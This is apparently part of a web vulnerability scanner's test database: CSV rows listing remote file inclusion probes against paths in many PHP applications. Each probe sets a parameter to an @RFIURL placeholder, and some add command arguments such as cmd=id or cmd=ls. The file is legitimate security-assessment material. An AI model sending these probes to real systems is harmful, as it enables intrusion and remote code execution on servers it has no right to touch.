"004205","5292","c","/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004206","5292","c","/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004207","5292","c","/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004208","5292","c","/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004209","5292","c","/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004210","5292","c","/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004211","5292","c","/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004212","5292","c","/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004213","5292","c","/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004214","5292","c","/administrator/components/com_webring/admin.webring.docs.php?component_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004215","5292","c","/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004216","5292","c","/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004217","5292","c","/administrator/components/com_wmtrssreader/admin.wmtrssreader.php?mosConfig_live_site=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004218","5292","c","/administrator/menu_add.php?site_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004219","5292","c","/administrator/menu_operation.php?site_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004220","5292","c","/adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004221","5292","c","/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004222","5292","c","/adodb/adodb-errorpear.inc.php?ourlinux_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004223","5292","c","/adodb/adodb-pear.inc.php?ourlinux_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004224","5292","c","/adodb/adodb.inc.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004225","5292","c","/advanced_comment_system/admin.php?ACS_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004226","5292","c","/advanced_comment_system/index.php?ACS_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004227","5292","c","/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004228","5292","c","/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004229","5292","c","/agenda.php3?rootagenda=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004230","5292","c","/agenda2.php3?rootagenda=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004231","5292","c","/aides/index.php?page=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004232","5292","c","/ains_main.php?ains_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004233","5292","c","/ajax/loadsplash.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004234","5292","c","/ajouter.php?include=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004235","5292","c","/akarru.gui/main_content.php?bm_content=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004236","5292","c","/akocomments.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004237","5292","c","/amazon/cart.php?cmd=add&asin=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004238","5292","c","/amazon/index.php?lang=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004239","5292","c","/amazon/info.php?asin=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004240","5292","c","/annonce.php?page=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004241","5292","c","/announcements.php?phpraid_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004242","5292","c","/anzagien.php?config[root_ordner]=@RFIURL?cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004243","5292","c","/apbn/templates/head.php?APB_SETTINGS[template_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004244","5292","c","/api.php?t_path_core=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004245","5292","c","/apps/apps.php?app=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004246","5292","c","/appserv/main.php?appserv_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004247","5292","c","/arab3upload/customize.php?path=@RFIURL?&cmd=pwd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004248","5292","c","/arab3upload/initialize.php?path=@RFIURL?&cmd=pwd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004249","5292","c","/arash_lib/class/arash_gadmin.class.php?arashlib_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004250","5292","c","/arash_lib/class/arash_sadmin.class.php?arashlib_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004251","5292","c","/arash_lib/include/edit.inc.php?arashlib_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004252","5292","c","/arash_lib/include/list_features.inc.php?arashlib_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004253","5292","c","/archive.php?scriptpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004254","5292","c","/aroundme/template/barnraiser_01/pol_view.tpl.php?poll=1&templatePath=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004255","5292","c","/artlist.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004256","5292","c","/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=@RFIURL?cmd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004257","5292","c","/assets/snippets/reflect/snippet.reflect.php?reflect_base=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004258","5292","c","/athena.php?athena_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004259","5292","c","/auction/auction_common.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004260","5292","c","/auction/includes/converter.inc.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004261","5292","c","/auction/includes/messages.inc.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004262","5292","c","/auction/includes/settings.inc.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004263","5292","c","/auction/phpAdsNew/view.inc.php?phpAds_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004264","5292","c","/auth.cookie.inc.php?da_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004265","5292","c","/auth.header.inc.php?da_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004266","5292","c","/auth.sessions.inc.php?da_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004267","5292","c","/auth/auth.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004268","5292","c","/auth/auth_phpbb/phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004269","5292","c","/authenticate.php?default_path_for_themes=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004270","5292","c","/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004271","5292","c","/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004272","5292","c","/auto_check_renewals.php?installed_config_file=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004273","5292","c","/autoindex.php?cfg_file=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004274","5292","c","/awzmb/adminhelp.php?Setting[OPT_includepath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004275","5292","c","/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004276","5292","c","/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004277","5292","c","/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004278","5292","c","/awzmb/modules/help.incl.php?Setting[OPT_includepath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004279","5292","c","/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004280","5292","c","/axoverzicht.cgi?maand=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004281","5292","c","/b2-tools/gm-2-b2.php?b2inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004282","5292","c","/b2verifauth.php?index=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004283","5292","c","/backend/addons/links/index.php?PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004284","5292","c","/basebuilder/src/main.inc.php?mj_config[src_path]=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004285","5292","c","/bb_admin.php?includeFooter=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004286","5292","c","/beacon/language/1/splash.lang.php?languagePath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004287","5292","c","/beacon/language/1/splash.lang.php?languagePath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004288","5292","c","/belegungsplan/jahresuebersicht.inc.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004289","5292","c","/belegungsplan/monatsuebersicht.inc.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004290","5292","c","/belegungsplan/tagesuebersicht.inc.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004291","5292","c","/belegungsplan/wochenuebersicht.inc.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004292","5292","c","/bemarket/postscript/postscript.php?p_mode=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004293","5292","c","/biblioteca/bib_form.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004294","5292","c","/biblioteca/bib_pldetails.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004295","5292","c","/biblioteca/bib_plform.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004296","5292","c","/biblioteca/bib_plsearchc.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004297","5292","c","/biblioteca/bib_plsearchs.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004298","5292","c","/biblioteca/bib_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004299","5292","c","/biblioteca/bib_searchc.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004300","5292","c","/biblioteca/bib_searchs.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004301","5292","c","/biblioteca/edi_form.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004302","5292","c","/biblioteca/edi_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004303","5292","c","/biblioteca/gen_form.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004304","5292","c","/biblioteca/gen_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004305","5292","c","/biblioteca/lin_form.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004306","5292","c","/biblioteca/lin_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004307","5292","c","/biblioteca/luo_form.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004308","5292","c","/biblioteca/luo_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004309","5292","c","/biblioteca/sog_form.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004310","5292","c","/biblioteca/sog_save.php?CLASSPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004311","5292","c","/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004312","5292","c","/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004313","5292","c","/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004314","5292","c","/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004315","5292","c","/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004316","5292","c","/bild.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004317","5292","c","/bin/qte_init.php?qte_root=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004318","5292","c","/bingoserver.php3?response_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004319","5292","c","/block.php?Include=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004320","5292","c","/blocks/birthday.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004321","5292","c","/blocks/events.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004322","5292","c","/blocks/help.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004323","5292","c","/blogcms/admin/media.php?DIR_LIBS=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004324","5292","c","/blogcms/admin/xmlrpc/server.php?DIR_LIBS=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004325","5292","c","/blogcms/index.php?DIR_PLUGINS=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004326","5292","c","/board/post.php?qb_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004327","5292","c","/boitenews4/index.php?url_index=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004328","5292","c","/books/allbooks.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004329","5292","c","/books/home.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004330","5292","c","/books/mybooks.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004331","5292","c","/bp_ncom.php?bnrep=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004332","5292","c","/bp_ncom.php?bnrep=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004333","5292","c","/bp_news.php?bnrep=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004334","5292","c","/bridge/enigma/E2_header.inc.php?boarddir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004335","5292","c","/bridge/yabbse.inc.php?sourcedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004336","5292","c","/bridges/SMF/logout.php?path_to_smf=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004337","5292","c","/bu/bu_cache.php?bu_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004338","5292","c","/bu/bu_claro.php?bu_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004339","5292","c","/bu/bu_parse.php?bu_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004340","5292","c","/bu/process.php?bu_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004341","5292","c","/buddy.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004342","5292","c","/builddb.php?env_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004343","5292","c","/button/settings_sql.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004344","5292","c","/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004345","5292","c","/cal.func.php?dir_edge_lang=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004346","5292","c","/calcul-page.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004347","5292","c","/calendar.php?cfg_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004348","5292","c","/calendar.php?lang=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004349","5292","c","/calendar.php?path_to_calendar=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004350","5292","c","/calendar.php?vwar_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"004351","5292","c","/calendar.php?vwar_root=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
